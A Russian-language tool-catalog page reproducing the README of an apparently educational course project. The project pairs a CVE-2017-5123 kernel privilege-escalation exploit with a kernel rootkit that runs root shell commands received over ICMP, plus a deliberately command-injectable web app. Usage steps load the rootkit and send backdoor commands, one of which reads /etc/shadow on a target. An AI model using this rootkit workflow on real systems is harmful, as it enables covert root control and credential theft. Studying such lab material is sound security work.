Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2017-5123 — Образовательная демонстрация эксплойта ядра CVE-2017-5123, командно-контрольного центра руткита на основе ICMP и уязвимого веб-приложения для внедрения команд ОС для обучения кибербезопасности. | Kitploit
Инструменты/GitHubGitHub/nabilboudra/cve-2017-5123
Повышение привилегийЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHubnabilboudra/cve-2017-5123

cve-2017-5123

Образовательная демонстрация эксплойта ядра CVE-2017-5123, командно-контрольного центра руткита на основе ICMP и уязвимого веб-приложения для внедрения команд ОС для обучения кибербезопасности.

8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2017-5123

Этот репозиторий содержит демонстрацию CVE-2017-5123, ICMP-бэкдора с командным управлением, и веб-приложения, уязвимого к CWE-78 (внедрение команд ОС).

Часть CSC 4308 – Challenge 3.

Предварительные требования

  • Ядро Linux: 4.13 до (но не включая) 4.13.7
  • Node.js: 10.x
  • npm: 6.x

Обзор

Этот проект демонстрирует три различных компонента исследований безопасности:

1. Эксплойт ядра CVE-2017-5123 (lkm/rootkit.c)

Доказательство концепции эксплойта уязвимости системного вызова waitid, появившейся в ядре Linux 4.13. Эта уязвимость позволяет повысить привилегии и выйти из песочницы.

  • CVE ID: CVE-2017-5123
  • CWE ID: CWE-787 (выход за границы буфера)
  • Воздействие: локальное повышение привилегий
  • Автор эксплойта: Chris Salls (@chris_salls)

2. Руткит ядра LKM (lkm/lkm.c)

Вредоносный модуль ядра Linux (LKM), реализующий скрытый канал управления и контроля через ICMP-пакеты эхо-запроса (ping).

  • CWE ID: CWE-912 (скрытая функциональность)
  • Функциональность:
    • Перехватывает ICMP-эхо-запросы с номером последовательности 25678
    • Извлекает команды оболочки из полезной нагрузки ICMP
    • Выполняет команды с правами root
    • Возвращает вывод команд через ICMP-пакеты эхо-ответа

3. Уязвимое веб-приложение (vulnerable-app/)

Приложение для обмена файлами на React + Node.js, уязвимое к внедрению команд ОС.

  • CWE ID: CWE-78 (внедрение команд ОС)
  • Слабость: внедрение метасимволов оболочки в поле содержимого файла

4. ICMP Pinger для данных (pinger/data-ping.c)

Утилита для отправки специально сформированных ICMP-эхо-запросов с произвольной полезной нагрузкой для взаимодействия с бэкдором руткита ядра.

Использование

Загрузка LKM

Сборка модуля ядра

root@kitploit:~
cd lkm
make

Загрузка модуля ядра

root@kitploit:~
sudo insmod lkm.ko

Сборка клиента Pinger

root@kitploit:~
cd ../pinger
gcc -o data-ping data-ping.c

Отправка команд через ICMP

root@kitploit:~
# Должно выполняться от root для использования raw-сокетов
sudo ./data-ping <target-ip> "whoami"
sudo ./data-ping localhost "ls -la /root"
sudo ./data-ping 192.168.1.100 "cat /etc/shadow"

Выгрузка модуля

root@kitploit:~
sudo rmmod lkm

Быстрая перезагрузка

root@kitploit:~
make reload

Запуск уязвимого веб-приложения

root@kitploit:~
# Сборка фронтенда
cd vulnerable-app/frontend
npm run build

# Копирование собранного приложения в бэкенд
cp -r build ../backend/

# Запуск сервера бэкенда (обслуживает и API, и фронтенд)
cd ../backend
npm start

Приложение будет доступно по адресу http://localhost:3001

Ссылки

  • CVE-2017-5123: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123
  • CWE-78: https://cwe.mitre.org/data/definitions/78.html
  • CWE-787: https://cwe.mitre.org/data/definitions/787.html
  • CWE-912: https://cwe.mitre.org/data/definitions/912.html
  • Оригинальный код эксплойта Chris Salls: https://github.com/salls/kernel-exploits
Скачать инструмент